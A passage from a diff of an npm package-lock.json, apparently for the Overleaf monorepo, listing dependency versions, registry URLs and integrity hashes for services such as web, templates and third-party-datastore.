true, + "engines": { + "node": ">=14.16.0" + } + }, + "services/spelling": { + "name": "@overleaf/spelling", + "version": "0.1.4", + "extraneous": true, + "dependencies": { + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "@overleaf/o-error": "*", + "@overleaf/settings": "*", + "async": "^3.2.5", + "body-parser": "^1.20.3", + "bunyan": "^1.8.15", + "express": "^4.21.0", + "lru-cache": "^5.1.1", + "request": "^2.88.2", + "underscore": "1.13.1" + }, + "devDependencies": { + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "esmock": "^2.6.3", + "mocha": "^10.2.0", + "sinon": "^9.2.4", + "typescript": "^5.0.4" + } + }, + "services/templates": { + "name": "@overleaf/templates", + "dependencies": { + "@overleaf/fetch-utils": "*", + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "@overleaf/promise-utils": "*", + "@overleaf/settings": "*", + "args-js": "0.10.12", + "async": "^3.2.5", + "body-parser": "^1.20.3", + "bunyan": "^1.8.15", + "express": "^4.21.2", + "install": "^0.13.0", + "lodash": "^4.17.21", + "marked": "^4.1.0", + "method-override": "^3.0.0", + "mongoose": "^8.9.5", + "request": "^2.88.2" + }, + "devDependencies": { + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "mocha": "^11.1.0", + "sandboxed-module": "^2.0.4", + "sinon": "^9.2.4", + "typescript": "^5.0.4" + } + }, + "services/third-party-datastore": { + "name": "@overleaf/third-party-datastore", + "dependencies": { + "@overleaf/access-token-encryptor": "*", + "@overleaf/fetch-utils": "*", + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "@overleaf/o-error": "*", + "@overleaf/settings": "*", + "async": "^3.2.5", + "body-parser": "^1.20.3", + "bunyan": "^1.8.15", + "dropbox": "^10.34.0", + "express": "^4.21.2", + "lodash": "^4.17.21", + "lru-cache": "^4.1.5", + "minimatch": "^7.4.2", + "minimist": "^1.2.8", + "mongodb-legacy": "6.1.3", + "node-fetch": "^2.7.0", + "p-limit": "^2.3.0" + }, + "devDependencies": { + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "mocha": "^11.1.0", + 
"sandboxed-module": "^2.0.4", + "sinon": "9.0.1", + "sinon-chai": "^3.7.0", + "sinon-stub-promise": "^4.0.0", + "typescript": "^5.0.4" + } + }, + "services/third-party-datastore/node_modules/brace-expansion": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", + "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", + "dependencies": { + "balanced-match": "^1.0.0" + } + }, + "services/third-party-datastore/node_modules/diff": { + "version": "4.0.2", + "resolved": "https://registry.npmjs.org/diff/-/diff-4.0.2.tgz", + "integrity": "sha512-58lmxKSA4BNyLz+HHMUzlOEpg09FV+ev6ZMe3vJihgdxzgcwZ8VoEEPmALCZG9LmqfVoNMMKpttIYTVG6uDY7A==", + "dev": true, + "engines": { + "node": ">=0.3.1" + } + }, + "services/third-party-datastore/node_modules/lru-cache": { + "version": "4.1.5", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-4.1.5.tgz", + "integrity": "sha512-sWZlbEP2OsHNkXrMl5GYk/jKk70MBng6UU4YI/qGDYbgf6YbP4EvmqISbXCoJiRKs+1bSpFHVgQxvJ17F2li5g==", + "dependencies": { + "pseudomap": "^1.0.2", + "yallist": "^2.1.2" + } + }, + "services/third-party-datastore/node_modules/minimatch": { + "version": "7.4.2", + "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-7.4.2.tgz", + "integrity": "sha512-xy4q7wou3vUoC9k1xGTXc+awNdGaGVHtFUaey8tiX4H1QRc04DZ/rmDFwNm2EBsuYEhAZ6SgMmYf3InGY6OauA==", + "dependencies": { + "brace-expansion": "^2.0.1" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + } + }, + "services/third-party-datastore/node_modules/p-limit": { + "version": "2.3.0", + "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", + "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", + "dependencies": { + "p-try": "^2.0.0" + }, + "engines": { + "node": ">=6" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "services/third-party-datastore/node_modules/sinon": { + "version": "9.0.1", + "resolved": "https://registry.npmjs.org/sinon/-/sinon-9.0.1.tgz", + "integrity": "sha512-iTTyiQo5T94jrOx7X7QLBZyucUJ2WvL9J13+96HMfm2CGoJYbIPqRfl6wgNcqmzk0DI28jeGx5bUTXizkrqBmg==", + "dev": true, + "dependencies": { + "@sinonjs/commons": "^1.7.0", + "@sinonjs/fake-timers": "^6.0.0", + "@sinonjs/formatio": "^5.0.1", + "@sinonjs/samsam": "^5.0.3", + "diff": "^4.0.2", + "nise": "^4.0.1", + "supports-color": "^7.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/sinon" + } + }, + "services/third-party-datastore/node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dev": true, + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "services/third-party-datastore/node_modules/yallist": { + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-2.1.2.tgz", + "integrity": "sha1-HBH5IY8HYImkfdUS+TxmmaaoHVI=" + }, + "services/third-party-references": { + "name": "@overleaf/thirdparty-references", + "license": "ISC", + "dependencies": { + "@overleaf/access-token-encryptor": "*", + "@overleaf/fetch-utils": "*", + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "@overleaf/o-error": "*", + "@overleaf/promise-utils": "*", + 
"@overleaf/settings": "*", + "async": "^3.2.5", + "body-parser": "^1.20.3", + "bunyan": "^1.8.15", + "express": "^4.21.0", + "lodash": "^4.17.21", + "lru-cache": "^5.1.1", + "mongodb-legacy": "6.1.3", + "oauth": "0.9.15", + "request": "^2.88.2", + "simple-oauth2": "^5.0.0" + }, + "devDependencies": { + "@types/simple-oauth2": "^5.0.7", + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "esmock": "^2.6.3", + "mocha": "^11.1.0", + "sinon": "9.0.2", + "sinon-chai": "^3.7.0", + "typescript": "^5.0.4" + } + }, + "services/third-party-references/node_modules/diff": { + "version": "4.0.2", + "resolved": "https://registry.npmjs.org/diff/-/diff-4.0.2.tgz", + "integrity": "sha512-58lmxKSA4BNyLz+HHMUzlOEpg09FV+ev6ZMe3vJihgdxzgcwZ8VoEEPmALCZG9LmqfVoNMMKpttIYTVG6uDY7A==", + "dev": true, + "engines": { + "node": ">=0.3.1" + } + }, + "services/third-party-references/node_modules/sinon": { + "version": "9.0.2", + "resolved": "https://registry.npmjs.org/sinon/-/sinon-9.0.2.tgz", + "integrity": "sha512-0uF8Q/QHkizNUmbK3LRFqx5cpTttEVXudywY9Uwzy8bTfZUhljZ7ARzSxnRHWYWtVTeh4Cw+tTb3iU21FQVO9A==", + "dev": true, + "dependencies": { + "@sinonjs/commons": "^1.7.2", + "@sinonjs/fake-timers": "^6.0.1", + "@sinonjs/formatio": "^5.0.1", + "@sinonjs/samsam": "^5.0.3", + "diff": "^4.0.2", + "nise": "^4.0.1", + "supports-color": "^7.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/sinon" + } + }, + "services/third-party-references/node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dev": true, + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "services/tpdsworker": { + "name": "@overleaf/tpdsworker", + "dependencies": { + "@overleaf/fetch-utils": "*", + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "@overleaf/o-error": "*", + "@overleaf/redis-wrapper": "*", + "@overleaf/settings": "*", + "body-parser": "^1.20.3", + "bunyan": "^1.8.15", + "dtrace-provider": "^0.8.8", + "express": "^4.21.2", + "express-basic-auth": "^1.2.0", + "ioredis": "^4.16.0", + "lodash": "^4.17.15", + "redlock": "^4.1.0", + "request": "^2.88.2" + }, + "devDependencies": { + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "chai-http": "^4.4.0", + "mocha": "^11.1.0", + "typescript": "^5.0.4" + } + }, + "services/web": { + "name": "@overleaf/web", + "dependencies": { + "@contentful/rich-text-html-renderer": "^16.0.2", + "@contentful/rich-text-types": "^16.0.2", + "@google-cloud/bigquery": "^6.0.1", + "@node-oauth/oauth2-server": "^5.1.0", + "@node-saml/passport-saml": "^4.0.4", + "@overleaf/access-token-encryptor": "*", + "@overleaf/fetch-utils": "*", + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "@overleaf/mongo-utils": "*", + "@overleaf/o-error": "*", + "@overleaf/object-persistor": "*", + "@overleaf/promise-utils": "*", + "@overleaf/redis-wrapper": "*", + "@overleaf/settings": "*", + "@phosphor-icons/react": "^2.1.7", + "@slack/webhook": "^7.0.2", + "@stripe/react-stripe-js": "^3.1.1", + "@stripe/stripe-js": "^5.6.0", + "@xmldom/xmldom": "^0.7.13", + "accepts": "^1.3.7", + "ajv": "^8.12.0", + "archiver": "^5.3.0", + "async": "^3.2.5", + "base-x": "^4.0.0", + "basic-auth": "^2.0.1", + "bcrypt": "^5.0.0", + "body-parser": "^1.20.3", + "bowser": "^2.11.0", + "bull": "^3.18.0", + "bunyan": "^1.8.15", + "cache-flow": "^1.9.0", + "celebrate": 
"^15.0.3", + "connect-redis": "^6.1.3", + "content-disposition": "^0.5.0", + "contentful": "^10.8.5", + "cookie": "^0.2.3", + "cookie-parser": "1.4.6", + "crc-32": "^1.2.2", + "csurf": "^1.11.0", + "csv": "^6.2.5", + "dateformat": "1.0.4-1.2.3", + "east": "^2.0.2", + "ejs": "^3.1.10", + "email-addresses": "^5.0.0", + "eventsource-parser": "^1.1.2", + "express": "^4.21.2", + "express-bearer-token": "^2.4.0", + "express-http-proxy": "^1.6.0", + "express-session": "^1.17.1", + "globby": "^5.0.0", + "helmet": "^6.0.1", + "https-proxy-agent": "^7.0.6", + "i18next": "^23.10.0", + "i18next-fs-backend": "^2.3.1", + "i18next-http-middleware": "^3.5.0", + "joi": "^17.12.0", + "jose": "^4.3.8", + "json2csv": "^4.3.3", + "jsonwebtoken": "^9.0.0", + "lodash": "^4.17.19", + "lru-cache": "^7.10.1", + "marked": "^4.1.0", + "method-override": "^2.3.3", + "minimatch": "^7.4.2", + "minimist": "^1.2.7", + "mmmagic": "^0.5.3", + "moment": "^2.29.4", + "mongodb-legacy": "6.1.3", + "mongoose": "8.9.5", + "multer": "overleaf/multer#e1df247fbf8e7590520d20ae3601eaef9f3d2e9e", + "nocache": "^2.1.0", + "node-fetch": "^2.7.0", + "nodemailer": "^6.7.0", + "nodemailer-ses-transport": "^1.5.1", + "on-headers": "^1.0.2", + "otplib": "^12.0.1", + "p-limit": "^2.3.0", + "p-props": "4.0.0", + "p-queue": "^8.1.0", + "parse-data-url": "^2.0.0", + "passport": "^0.6.0", + "passport-google-oauth20": "^2.0.0", + "passport-ldapauth": "^2.1.4", + "passport-local": "^1.0.0", + "passport-oauth2": "^1.5.0", + "passport-orcid": "0.0.4", + "pug": "^3.0.3", + "pug-runtime": "^3.0.1", + "rate-limiter-flexible": "^2.4.1", + "recurly": "^4.0.0", + "referer-parser": "github:overleaf/nodejs-referer-parser#8b8b103762d05b7be4cfa2f810e1d408be67d7bb", + "request": "^2.88.2", + "requestretry": "^7.1.0", + "sanitize-html": "^2.8.1", + "stripe": "^17.7.0", + "tough-cookie": "^4.0.0", + "tsscmp": "^1.0.6", + "uid-safe": "^2.1.5", + "utf-8-validate": "^5.0.2", + "valid-data-url": "^2.0.0", + "valid-url": "^1.0.9", + "xml-crypto": "^2.1.6", + "xml2js": "^0.6.2", + "xregexp": "^4.3.0", + "yauzl": "^2.10.0" + }, + "devDependencies": { + "@babel/cli": "^7.24.8", + "@babel/core": "^7.25.2", + "@babel/preset-env": "^7.25.3", + "@babel/preset-react": "^7.24.7", + "@babel/preset-typescript": "^7.24.7", + "@babel/register": "^7.24.6", + "@codemirror/autocomplete": "github:overleaf/codemirror-autocomplete#6445cd056671c98d12d1c597ba705e11327ec4c5", + "@codemirror/commands": "^6.8.0", + "@codemirror/lang-markdown": "^6.3.2", + "@codemirror/language": "^6.10.8", + "@codemirror/lint": "^6.8.4", + "@codemirror/search": "github:overleaf/codemirror-search#04380a528c339cd4b78fb10b3ef017f657ec17bd", + "@codemirror/state": "^6.5.2", + "@codemirror/view": "^6.36.3", + "@juggle/resize-observer": "^3.3.1", + "@lezer/common": "^1.2.3", + "@lezer/generator": "^1.7.1", + "@lezer/highlight": "^1.2.1", + "@lezer/lr": "^1.4.2", + "@lezer/markdown": "^1.3.2", + "@overleaf/codemirror-tree-view": "^0.1.3", + "@overleaf/dictionaries": "https://github.com/overleaf/dictionaries/archive/refs/tags/v0.0.3.tar.gz", + "@overleaf/ranges-tracker": "*", + "@overleaf/stream-utils": "*", + "@pmmmwh/react-refresh-webpack-plugin": "^0.5.15", + "@pollyjs/adapter-node-http": "^6.0.6", + "@pollyjs/core": "^6.0.6", + "@pollyjs/persister-fs": "^6.0.6", + "@replit/codemirror-emacs": "overleaf/codemirror-emacs#4394c03858f27053f8768258e9493866e06e938e", + "@replit/codemirror-indentation-markers": "overleaf/codemirror-indentation-markers#78264032eb286bc47871569ae87bff5ca1c6c161", + "@replit/codemirror-vim": 
"overleaf/codemirror-vim#1bef138382d948018f3f9b8a4d7a70ab61774e4b", + "@sentry/browser": "7.46.0", + "@storybook/addon-a11y": "^8.6.4", + "@storybook/addon-essentials": "^8.6.4", + "@storybook/addon-interactions": "^8.6.4", + "@storybook/addon-links": "^8.6.4", + "@storybook/addon-styling-webpack": "^1.0.1", + "@storybook/addon-webpack5-compiler-babel": "^3.0.5", + "@storybook/cli": "^8.6.4", + "@storybook/react": "^8.6.4", + "@storybook/react-webpack5": "^8.6.4", + "@storybook/theming": "^8.6.4", + "@testing-library/cypress": "^10.0.1", + "@testing-library/dom": "^9.3.0", + "@testing-library/react": "^12.1.5", + "@testing-library/react-hooks": "^8.0.1", + "@testing-library/user-event": "^14.4.3", + "@types/bootstrap": "^5.2.10", + "@types/bootstrap-5": "npm:@types/bootstrap@^5.2.10", + "@types/chai": "^4.3.0", + "@types/dateformat": "^5.0.2", + "@types/diff": "^5.0.9", + "@types/events": "^3.0.0", + "@types/express": "^4.17.13", + "@types/mocha": "^9.1.0", + "@types/mocha-each": "^2.0.0", + "@types/react": "^17.0.40", + "@types/react-bootstrap": "^0.32.36", + "@types/react-color": "^3.0.6", + "@types/react-dom": "^17.0.13", + "@types/react-google-recaptcha": "^2.1.5", + "@types/react-linkify": "^1.0.0", + "@types/recurly__recurly-js": "^4.22.0", + "@types/sinon-chai": "^3.2.8", + "@types/uuid": "^9.0.8", + "@uppy/core": "^3.8.0", + "@uppy/dashboard": "^3.7.1", + "@uppy/drag-drop": "^3.0.3", + "@uppy/file-input": "^3.0.4", + "@uppy/progress-bar": "^3.0.4", + "@uppy/react": "^3.2.1", + "@uppy/utils": "^5.7.0", + "@uppy/xhr-upload": "^3.6.0", + "5to6-codemod": "^1.8.0", + "abort-controller": "^3.0.0", + "acorn": "^7.1.1", + "acorn-walk": "^7.1.1", + "algoliasearch": "^3.35.1", + "autoprefixer": "^10.4.16", + "babel-loader": "^9.1.3", + "babel-plugin-macros": "^3.1.0", + "babel-plugin-module-resolver": "^5.0.2", + "backbone": "^1.6.0", + "bootstrap": "^3.4.1", + "bootstrap-5": "npm:bootstrap@^5.3.3", + "c8": "^7.2.0", + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "chai-exclude": "^2.0.3", + "chart.js": "^4.0.1", + "chartjs-adapter-moment": "^1.0.1", + "chartjs-plugin-datalabels": "^2.2.0", + "cheerio": "^1.0.0-rc.3", + "classnames": "^2.2.6", + "cookie-signature": "^1.2.1", + "copy-webpack-plugin": "^11.0.0", + "core-js": "^3.38.1", + "css-loader": "^6.8.1", + "css-minimizer-webpack-plugin": "^5.0.1", + "cypress": "13.13.2", + "cypress-plugin-tab": "^1.0.5", + "d3": "^3.5.16", + "daterangepicker": "2.1.27", + "diff": "^5.1.0", + "dompurify": "^3.2.4", + "downshift": "^6.1.0", + "es6-promise": "^4.2.8", + "escodegen": "^2.0.0", + "eslint-config-standard-jsx": "^11.0.0", + "eslint-plugin-jsx-a11y": "^6.7.1", + "eslint-plugin-react": "^7.32.2", + "eslint-plugin-react-hooks": "^4.6.0", + "eslint-plugin-testing-library": "^7.1.1", + "eslint-plugin-unicorn": "^56.0.0", + "esmock": "^2.6.7", + "events": "^3.3.0", + "fake-indexeddb": "^6.0.0", + "fetch-mock": "^12.5.2", + "formik": "^2.2.9", + "fuse.js": "^3.0.0", + "glob": "^7.1.6", + "handlebars": "^4.7.8", + "handlebars-loader": "^1.7.3", + "html-webpack-plugin": "^5.5.3", + "i18next-scanner": "^4.4.0", + "jquery": "^3.7.1", + "jscodeshift": "^17.0.0", + "jsdom": "^19.0.0", + "jsdom-global": "^3.0.2", + "less": "^3.13.1", + "less-loader": "^11.1.3", + "match-sorter": "^6.2.0", + "mathjax": "^3.2.2", + "mensch": "^0.3.4", + "micromark": "^4.0.0", + "mini-css-extract-plugin": "^2.7.6", + "mocha": "^11.1.0", + "mocha-each": "^2.0.1", + "mock-fs": "^5.1.2", + "nock": "^13.5.6", + "nvd3": "^1.8.6", + "overleaf-editor-core": "*", + "pdfjs-dist": 
"4.10.38", + "pirates": "^4.0.1", + "postcss": "^8.4.31", + "postcss-loader": "^7.3.3", + "prop-types": "^15.7.2", + "qrcode": "^1.4.4", + "react": "^17.0.2", + "react-bootstrap-5": "npm:react-bootstrap@^2.10.5", + "react-chartjs-2": "^5.0.1", + "react-color": "^2.19.3", + "react-dnd": "^16.0.1", + "react-dnd-html5-backend": "^16.0.1", + "react-dom": "^17.0.2", + "react-error-boundary": "^2.3.1", + "react-google-recaptcha": "^3.1.0", + "react-i18next": "^13.3.1", + "react-linkify": "^1.0.0-alpha", + "react-refresh": "^0.14.0", + "react-resizable-panels": "^2.1.1", + "resolve-url-loader": "^5.0.0", + "samlp": "^7.0.2", + "sandboxed-module": "overleaf/node-sandboxed-module#cafa2d60f17ce75cc023e6f296eb8de79d92d35d", + "sass": "^1.77.1", + "sass-loader": "^14.2.1", + "scroll-into-view-if-needed": "^2.2.25", + "sinon": "^7.5.0", + "sinon-chai": "^3.7.0", + "sinon-mongoose": "^2.3.0", + "storybook": "^8.6.4", + "stylelint-config-standard-scss": "^13.1.0", + "terser-webpack-plugin": "^5.3.9", + "thread-loader": "^4.0.2", + "timekeeper": "^2.2.0", + "to-string-loader": "^1.2.0", + "tty-browserify": "^0.0.1", + "typescript": "^5.0.4", + "uuid": "^9.0.1", + "w3c-keyname": "^2.2.8", + "webpack": "^5.98.0", + "webpack-assets-manifest": "^5.2.1", + "webpack-cli": "^5.1.4", + "webpack-dev-server": "^5.2.0", + "webpack-merge": "^5.10.0", + "yup": "^0.32.11" + } + }, + "services/web/node_modules/@babel/runtime": { + "version": "7.25.7", + "resolved": "https://registry.npmjs.org/@babel/runtime/-/runtime-7.25.7.tgz", + "integrity": "sha512-FjoyLe754PMiYsFaN5C94ttGiOmBNYTf6pLr4xXHAT5uctHb092PBszndLDR5XA/jghQvn4n7JMHl7dmTgbm9w==", + "dev": true, + "dependencies": { + "regenerator-runtime": "^0.14.0" + }, + "engines": { + "node": ">=6.9.0" + } + }, + "services/web/node_modules/@google-cloud/bigquery": { + "version": "6.0.3", + "resolved": "https://registry.npmjs.org/@google-cloud/bigquery/-/bigquery-6.0.3.tgz", + "integrity": "sha512-BP464228S9dqDCb4dR99h9D8+N498YZi/AZvoOJUaieg2H6qbiYBE1xlYuaMvyV1WEQT/2/yZTCJnCo5WiaY0Q==", + "dependencies": { + "@google-cloud/common": "^4.0.0", + "@google-cloud/paginator": "^4.0.0", + "@google-cloud/promisify": "^3.0.0", + "arrify": "^2.0.1", + "big.js": "^6.0.0", + "duplexify": "^4.0.0", + "extend": "^3.0.2", + "is": "^3.3.0", + "p-event": "^4.1.0", + "readable-stream": "^4.0.0", + "stream-events": "^1.0.5", + "uuid": "^8.0.0" + }, + "engines": { + "node": ">=12.0.0" + } + }, + "services/web/node_modules/@google-cloud/bigquery/node_modules/readable-stream": { + "version": "4.2.0", + "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-4.2.0.tgz", + "integrity": "sha512-gJrBHsaI3lgBoGMW/jHZsQ/o/TIWiu5ENCJG1BB7fuCKzpFM8GaS2UoBVt9NO+oI+3FcrBNbUkl3ilDe09aY4A==", + "dependencies": { + "abort-controller": "^3.0.0", + "buffer": "^6.0.3", + "events": "^3.3.0", + "process": "^0.11.10" + }, + "engines": { + "node": "^12.22.0 || ^14.17.0 || >=16.0.0" + } + }, + "services/web/node_modules/@google-cloud/bigquery/node_modules/uuid": { + "version": "8.3.2", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-8.3.2.tgz", + "integrity": "sha512-+NYs2QeMWy+GWFOEm9xnn6HCDp0l7QBD7ml8zLUmJ+93Q5NF0NocErnwkTkXVFNiX3/fpC6afS8Dhb/gz7R7eg==", + "bin": { + "uuid": "dist/bin/uuid" + } + }, + "services/web/node_modules/@google-cloud/common": { + "version": "4.0.3", + "resolved": "https://registry.npmjs.org/@google-cloud/common/-/common-4.0.3.tgz", + "integrity": "sha512-fUoMo5b8iAKbrYpneIRV3z95AlxVJPrjpevxs4SKoclngWZvTXBSGpNisF5+x5m+oNGve7jfB1e6vNBZBUs7Fw==", + "dependencies": { + 
"@google-cloud/projectify": "^3.0.0", + "@google-cloud/promisify": "^3.0.0", + "arrify": "^2.0.1", + "duplexify": "^4.1.1", + "ent": "^2.2.0", + "extend": "^3.0.2", + "google-auth-library": "^8.0.2", + "retry-request": "^5.0.0", + "teeny-request": "^8.0.0" + }, + "engines": { + "node": ">=12.0.0" + } + }, + "services/web/node_modules/@google-cloud/paginator": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/@google-cloud/paginator/-/paginator-4.0.1.tgz", + "integrity": "sha512-6G1ui6bWhNyHjmbYwavdN7mpVPRBtyDg/bfqBTAlwr413On2TnFNfDxc9UhTJctkgoCDgQXEKiRPLPR9USlkbQ==", + "dependencies": { + "arrify": "^2.0.0", + "extend": "^3.0.2" + }, + "engines": { + "node": ">=12.0.0" + } + }, + "services/web/node_modules/@google-cloud/projectify": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/@google-cloud/projectify/-/projectify-3.0.0.tgz", + "integrity": "sha512-HRkZsNmjScY6Li8/kb70wjGlDDyLkVk3KvoEo9uIoxSjYLJasGiCch9+PqRVDOCGUFvEIqyogl+BeqILL4OJHA==", + "engines": { + "node": ">=12.0.0" + } + }, + "services/web/node_modules/@google-cloud/promisify": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/@google-cloud/promisify/-/promisify-3.0.1.tgz", + "integrity": "sha512-z1CjRjtQyBOYL+5Qr9DdYIfrdLBe746jRTYfaYU6MeXkqp7UfYs/jX16lFFVzZ7PGEJvqZNqYUEtb1mvDww4pA==", + "engines": { + "node": ">=12" + } + }, + "services/web/node_modules/@overleaf/dictionaries": { + "version": "0.0.3", + "resolved": "https://github.com/overleaf/dictionaries/archive/refs/tags/v0.0.3.tar.gz", + "integrity": "sha512-/VJRrwY62Va2M4K5BE5UMruJHgKPGp0SGQkY/nrrQpBbHhMuTVoRtXkR+hcOfi1Iu6SO0vcwiK+L7xzs+fZmXQ==", + "dev": true + }, + "services/web/node_modules/@sentry/browser": { + "version": "7.46.0", + "resolved": "https://registry.npmjs.org/@sentry/browser/-/browser-7.46.0.tgz", + "integrity": "sha512-4rX9hKPjxzfH5LhZzO5DlS5NXQ8qZg2ibepaqEgcDHrpYh5813mjjnE4OQA8wiZ6WuG3xKFgHBrGeliD5jXz9w==", + "dev": true, + "dependencies": { + "@sentry-internal/tracing": "7.46.0", + "@sentry/core": "7.46.0", + "@sentry/replay": "7.46.0", + "@sentry/types": "7.46.0", + "@sentry/utils": "7.46.0", + "tslib": "^1.9.3" + }, + "engines": { + "node": ">=8" + } + }, + "services/web/node_modules/@sentry/browser/node_modules/tslib": { + "version": "1.14.1", + "resolved": "https://registry.npmjs.org/tslib/-/tslib-1.14.1.tgz", + "integrity": "sha512-Xni35NKzjgMrwevysHTCArtLDpPvye8zV/0E4EyYn43P7/7qvQwPh9BGkHewbMulVntbigmcT7rdX3BNo9wRJg==", + "dev": true + }, + "services/web/node_modules/@sentry/core": { + "version": "7.46.0", + "resolved": "https://registry.npmjs.org/@sentry/core/-/core-7.46.0.tgz", + "integrity": "sha512-BnNHGh/ZTztqQedFko7vb2u6yLs/kWesOQNivav32ZbsEpVCjcmG1gOJXh2YmGIvj3jXOC9a4xfIuh+lYFcA6A==", + "dev": true, + "dependencies": { + "@sentry/types": "7.46.0", + "@sentry/utils": "7.46.0", + "tslib": "^1.9.3" + }, + "engines": { + "node": ">=8" + } + }, + "services/web/node_modules/@sentry/core/node_modules/tslib": { + "version": "1.14.1", + "resolved": "https://registry.npmjs.org/tslib/-/tslib-1.14.1.tgz", + "integrity": "sha512-Xni35NKzjgMrwevysHTCArtLDpPvye8zV/0E4EyYn43P7/7qvQwPh9BGkHewbMulVntbigmcT7rdX3BNo9wRJg==", + "dev": true + }, + "services/web/node_modules/@sentry/types": { + "version": "7.46.0", + "resolved": "https://registry.npmjs.org/@sentry/types/-/types-7.46.0.tgz", + "integrity": "sha512-2FMEMgt2h6u7AoELhNhu9L54GAh67KKfK2pJ1kEXJHmWxM9FSCkizjLs/t+49xtY7jEXr8qYq8bV967VfDPQ9g==", + "dev": true, + "engines": { + "node": ">=8" + } + }, + "services/web/node_modules/@sentry/utils": { + 
"version": "7.46.0", + "resolved": "https://registry.npmjs.org/@sentry/utils/-/utils-7.46.0.tgz", + "integrity": "sha512-elRezDAF84guMG0OVIIZEWm6wUpgbda4HGks98CFnPsrnMm3N1bdBI9XdlxYLtf+ir5KsGR5YlEIf/a0kRUwAQ==", + "dev": true, + "dependencies": { + "@sentry/types": "7.46.0", + "tslib": "^1.9.3" + }, + "engines": { + "node": ">=8" + } + }, + "services/web/node_modules/@sentry/utils/node_modules/tslib": { + "version": "1.14.1", + "resolved": "https://registry.npmjs.org/tslib/-/tslib-1.14.1.tgz", + "integrity": "sha512-Xni35NKzjgMrwevysHTCArtLDpPvye8zV/0E4EyYn43P7/7qvQwPh9BGkHewbMulVntbigmcT7rdX3BNo9wRJg==", + "dev": true + }, + "services/web/node_modules/@sinonjs/formatio": { + "version": "3.2.2", + "resolved": "https://registry.npmjs.org/@sinonjs/formatio/-/formatio-3.2.2.tgz", + "integrity": "sha512-B8SEsgd8gArBLMD6zpRw3juQ2FVSsmdd7qlevyDqzS9WTCtvF55/gAL+h6gue8ZvPYcdiPdvueM/qm//9XzyTQ==", + "dev": true, + "dependencies": { + "@sinonjs/commons": "^1", + "@sinonjs/samsam": "^3.1.0" + } + }, + "services/web/node_modules/@sinonjs/samsam": { + "version": "3.3.3", + "resolved": "https://registry.npmjs.org/@sinonjs/samsam/-/samsam-3.3.3.tgz", + "integrity": "sha512-bKCMKZvWIjYD0BLGnNrxVuw4dkWCYsLqFOUWw8VgKF/+5Y+mE7LfHWPIYoDXowH+3a9LsWDMo0uAP8YDosPvHQ==", + "dev": true, + "dependencies": { + "@sinonjs/commons": "^1.3.0", + "array-from": "^2.1.1", + "lodash": "^4.17.15" + } + }, + "services/web/node_modules/@testing-library/dom": { + "version": "9.3.0", + "resolved": "https://registry.npmjs.org/@testing-library/dom/-/dom-9.3.0.tgz", + "integrity": "sha512-Dffe68pGwI6WlLRYR2I0piIkyole9cSBH5jGQKCGMRpHW5RHCqAUaqc2Kv0tUyd4dU4DLPKhJIjyKOnjv4tuUw==", + "dev": true, + "dependencies": { + "@babel/code-frame": "^7.10.4", + "@babel/runtime": "^7.12.5", + "@types/aria-query": "^5.0.1", + "aria-query": "^5.0.0", + "chalk": "^4.1.0", + "dom-accessibility-api": "^0.5.9", + "lz-string": "^1.5.0", + "pretty-format": "^27.0.2" + }, + "engines": { + "node": ">=14" + } + }, + "services/web/node_modules/@types/aria-query": { + "version": "5.0.1", + "resolved": "https://registry.npmjs.org/@types/aria-query/-/aria-query-5.0.1.tgz", + "integrity": "sha512-XTIieEY+gvJ39ChLcB4If5zHtPxt3Syj5rgZR+e1ctpmK8NjPf0zFqsz4JpLJT0xla9GFDKjy8Cpu331nrmE1Q==", + "dev": true + }, + "services/web/node_modules/@types/express": { + "version": "4.17.21", + "resolved": "https://registry.npmjs.org/@types/express/-/express-4.17.21.tgz", + "integrity": "sha512-ejlPM315qwLpaQlQDTjPdsUFSc6ZsP4AN6AlWnogPjQ7CVi7PYF3YVz+CY3jE2pwYf7E/7HlDAN0rV2GxTG0HQ==", + "dev": true, + "dependencies": { + "@types/body-parser": "*", + "@types/express-serve-static-core": 